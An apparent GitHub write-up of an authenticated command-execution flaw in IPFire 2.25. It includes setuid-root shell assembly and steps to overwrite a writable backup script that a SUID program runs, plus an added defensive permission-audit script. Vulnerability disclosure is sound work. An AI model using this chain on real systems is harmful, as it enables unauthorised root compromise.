MucahitSaratar/ipfire-2-25-auth-rce

IPFire 2.25 (Core Update 156) authenticated RCE

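  • The system runs a command when any package is installed.

[screenshot: packfileinstallation]

  • The system gets the package name (7zip here) from just the HTML.

[screenshot: pocpc0]

  • Then check the tmp directory.

[screenshot: pocpc1]

  • Version 2.25 - Core Update 156.

[screenshot: version]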

  • IPFire allows running arbitrary OS commands as nobody after login.

Be root!

  • Check the SUID binaries.

[screenshot: find-suid]

  • The backup program runs another script, /var/ipfire/backup/bin/backup.pl (it is a bash script and the permissions look good).

[screenshot: backup detection]

  • Try to write into the bash script. (No error. GOOD!)

[screenshot: write attempt]

  • Try to run bash.

[screenshot: proof of write access]

  • Yes, we can run it, but it is low-privileged. We must trigger setuid(0)!
  • Save this and run `alti name.asm q`.
  • alti is my own compile-check program in the soo_deep repo.
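```nasm
bits 64
section .data
  string db "/bin/bash",0x00
  olmadis db "basarisiz.",0x0a,0x00   ; failure message
  olmadil equ $-olmadis               ; length of the failure message
section .text
  global main
main:
  mov rax,105        ; setuid
  mov rdi,0          ; uid 0
  syscall
  cmp rax,0          ; 0 means setuid succeeded
  je getbash

  mov rax,1          ; write
  mov rdi,1          ; stdout
  mov rsi,olmadis
  mov rdx,olmadil
  syscall

  mov rax,60         ; exit
  xor rdi,rdi        ; status 0
  syscall

getbash:
  mov rax,59         ; execve
  mov rdi,string     ; "/bin/bash"
  mov rsi,0          ; argv = NULL
  mov rdx,0          ; envp = NULL
  syscall
```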
  • Then write the new program to /var/ipfire/backup/bin/backup.pl. (We can use a Python HTTP server and curl to write it.)

  • And enjoy the root shell!
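
A defender-side check for the condition this write-up relies on: a file executed by a SUID binary that a non-root account can modify. This is an added example, not code from the repository; the helper name `audit_root_run_file` and its trusted-UID parameter are assumptions, and it requires GNU `stat`.

```shell
#!/bin/sh
# Added example, not part of the original repository.
# audit_root_run_file PATH [TRUSTED_UID]   (hypothetical helper name)
#   0 = only TRUSTED_UID (default 0, root) can modify PATH or its directory
#   1 = another account could change what a privileged caller executes
#   2 = PATH does not exist
# Assumes GNU stat (stat -c), as found on Linux.
audit_root_run_file() {
    file_path=$1
    trusted_uid=${2:-0}
    result=0
    if [ ! -e "$file_path" ]; then
        echo "MISSING  $file_path"
        return 2
    fi
    # The directory matters too: write access there allows replacing the file.
    for target in "$file_path" "$(dirname "$file_path")"; do
        owner=$(stat -L -c '%u' "$target")
        mode=$(stat -L -c '%a' "$target")
        if [ "$owner" != "$trusted_uid" ]; then
            echo "OWNER    $target owned by uid $owner, expected $trusted_uid"
            result=1
        fi
        # 022 masks the group-write and other-write permission bits.
        if [ $(( 0$mode & 022 )) -ne 0 ]; then
            echo "WRITABLE $target has mode $mode (group/other write)"
            result=1
        fi
    done
    if [ "$result" -eq 0 ]; then
        echo "OK       $file_path"
    fi
    return "$result"
}

# Usage: sh audit.sh /var/ipfire/backup/bin/backup.pl
if [ "$#" -gt 0 ]; then
    for p in "$@"; do
        audit_root_run_file "$p"
    done
fi
```

Run it as root against every script or binary that a SUID program invokes; any `OWNER` or `WRITABLE` line means the file should be re-owned to root and stripped of group/other write permission.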
